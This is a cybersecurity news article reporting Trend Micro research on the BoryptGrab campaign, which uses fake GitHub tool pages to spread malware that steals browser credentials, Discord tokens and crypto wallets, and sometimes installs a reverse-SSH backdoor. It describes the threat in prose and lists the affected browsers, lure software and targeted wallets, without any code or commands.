Fake tools on GitHub are being used to raid Chrome, Microsoft Edge, and Brave browsers, to wipe your crypto wallets.
There’s a new predator stalking the Windows ecosystem. Security researchers at Trend Micro have identified a sophisticated malware family emerging from the digital underground to steal sensitive information.
The malware targets a total of 9 browsers, including Chrome, Microsoft Edge, and Brave, stealing saved passwords and credit card details, and even taking screenshots of your activity.
Malware scans your hard drive to hunt down cryptocurrency wallets, targeting over 30 platforms, including the giants Binance, Trezor, and Electrum. If you’re holding assets there, you’re officially on the radar.
Beyond financial data, the thieves are interested in digital identity. The software extracts Discord tokens and Telegram files, allowing attackers to hijack the victim’s social and professional communications.
It is highly likely that the attackers behind the campaign are in Russia. The researchers discovered Russian-language comments in the source code, and the servers used by the campaign are physically located in Russia.
What browsers are affected by the malware?
- Brave Browser
- CentBrowser
- Chromium
- Google Chrome
- Microsoft Edge
- Mozilla Firefox
- Opera
- Vivaldi
- Yandex Browser
Not everything in Google search results is safe
The attackers have deployed more than 100 public GitHub repositories with fake “free tool” download sites. The pages are optimized with keywords to ensure they appear at the top of search engine results.
Users searching for the newest software tools or other highly demanded queries are directed to a "github-io" page. These pages are designed to mimic the professional aesthetic of official documentation, but the ZIP files they offer are packed with Trojan malware.
“By tracing the infection chain, we were able to observe several ZIP archive files masquerading as common software tools,” the researchers said.
The campaign, dubbed BoryptGrab, has a broad reach, targeting victims through everything from gaming "hacks" to legitimate applications like VMware, Krita, Filmora, and Voicemod.
The full list of software exploited in the campaign:
- Valorant Performance Boost / FPS Booster
- Voicemod Pro Download Tool
- Wondershare “Info Feel”
- SkinChanger for CS2
- CoD Black Ops 6 Aimbot with ESP Tool
- ABI Free ESP Tool
- Arena Breakout Cheat
- Git Deployer App
- Valorant Skin Tool
- Filmora Watermark Remover
- R6 Siege Free ESP Tool
- Vmware download
- Passathook CS2
- Meta Skins
- CS2 Skin Changer Premium
- Passathook CS2
“The earliest ZIP file we identified dates to late 2025, while the initial commit of the earliest GitHub repository account was made in April 2025,” the researchers said.
The second stage of attack is even more troubling. Some variants of BoryptGrab install a backdoor called TunnesshClient.
Written in Python and disguised as a standard system file, this "backdoor" creates a reverse Secure Shell (SSH) tunnel that allows an attacker to communicate with the victim's computer.
These crypto wallets are targeted by the malicious campaign:
- Armory Wallet
- Atomic
- AtomicDEX
- Binance
- Bitcoin Core
- BitPay
- Blockstream Green
- Chia Wallet
- Coinomi
- Copay
- Daedalus Mainnet
- Dash Core
- Dogecoin
- Electron Cash
- Electrum
- ElectrumLTC
- Ethereum
- Exodus
- GreenAddress
- Guarda
- Jaxx Desktop
- Komodo Wallet
- Ledger Live
- Ledger Wallet
- Litecoin Core
- MEW Desktop
- MultiDoge
- MyEtherWallet
- NOW Wallet
- Raven Core
- StakeCube
- Trezor Suite
- Wasabi Wallet
The researchers highlight that the BoryptGrab campaign illustrates an evolving threat ecosystem.
“Threat actors increasingly exploit trust in legitimate developer platforms and open‑source ecosystems,” they warned.
“With dozens of repositories, shifting payloads, and numerous build names observed in the wild, the operation’s scale indicates an active and ongoing threat,” they added.
Unlock more exclusive Cybernews content on YouTube.
Your email address will not be published. Required fields are markedmarked